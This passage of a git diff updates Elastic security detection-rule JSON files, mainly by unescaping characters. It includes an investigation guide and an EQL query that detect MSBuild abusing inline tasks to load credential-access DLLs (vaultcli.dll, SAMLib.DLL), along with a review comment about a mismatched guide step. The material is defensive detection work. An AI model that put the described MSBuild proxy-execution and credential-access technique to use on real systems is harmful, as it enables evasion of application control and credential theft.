concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", "related_integrations": [ { @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_108.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_108.json index c34a9ef03d0..fd7a6b6a2c4 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_108.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_108.json 
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Trusted Developer Utility", - "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", "related_integrations": [ { @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -123,7 +123,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_104.json index b00b17555a9..0c6c49ebcee 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_104.json 
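Review bot: The new `note` text in this hunk keeps the step "searching for login events (for example, 4624) to the target host after the registry modification", but nothing in this rule concerns a registry modification — the `query` field two keys later matches `MSBuild.exe` loading `vaultcli.dll` or `SAMLib.DLL` — so the phrase looks copied from another investigation guide and will send an analyst looking for the wrong pivot event. I would change it to `...to the target host around the time of the DLL load event.` so the guide matches what the rule actually alerts on. The identical wording appears in the preceding `_107` hunk of the same rule (whose start is outside this chunk), so both copies need the same correction. The `\u003e` to `>` change the commit makes is semantically a no-op for JSON consumers; these files appear to be generated exports, so the wording fix presumably belongs in the upstream rule source rather than here.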
@@ -56,7 +56,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_105.json index 9c1929e3628..30bc3cfc985 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_105.json 
@@ -56,7 +56,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_106.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_106.json index 3b69bb99de0..299cee3f687 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_106.json 
@@ -56,7 +56,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_206.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_206.json index 55897fc2b28..49eb8b99d47 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_206.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_206.json 
@@ -66,7 +66,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_207.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_207.json index ec322c743ce..31d1d74fa52 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_207.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_207.json 
@@ -66,7 +66,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_208.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_208.json index 70040ddbc18..a4c991dd993 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_208.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6_208.json 
@@ -65,7 +65,7 @@ ], "risk_score": 21, "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae6", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_103.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_103.json index 779227b7713..d71d55b337c 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
@@ -66,7 +66,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_104.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_104.json index a1e15920161..ab39a969975 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -65,7 +65,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_105.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_105.json index 55437adccff..bd9d16e8d2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae9_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -78,7 +78,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_102.json b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_102.json index da6030d61a6..24d3acbb346 100644 
--- a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_102.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_103.json b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_103.json
index 395dd4a143c..188a7a14562 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_103.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_104.json b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_104.json
index 6d151e7c137..e429f26e0e8 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_104.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_105.json b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_105.json
index 20b89426954..0c15a2116cf 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d19ece6-c20e-481a-90c5-ccca596537de_105.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_101.json b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_101.json
index 2781ffb5b4f..57cc0d9b733 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_101.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_102.json b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_102.json
index 413635978bf..95d2c99f1bd 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_102.json
@@ -28,7 +28,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_103.json b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_103.json
index 1dc5ce8eac0..6bcfcd3b5c7 100644
--- a/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/9d302377-d226-4e12-b54c-1906b5aec4f6_103.json
@@ -38,7 +38,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_103.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_103.json
index 0920d48431d..a0d381acf72 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_103.json
@@ -44,7 +44,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_104.json b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_104.json
index 3648175a9af..49e012f432c 100644
--- a/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/9f1c4ca3-44b5-481d-ba42-32dc215a2769_104.json
@@ -44,7 +44,7 @@
 ],
 "risk_score": 47,
 "rule_id": "9f1c4ca3-44b5-481d-ba42-32dc215a2769",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
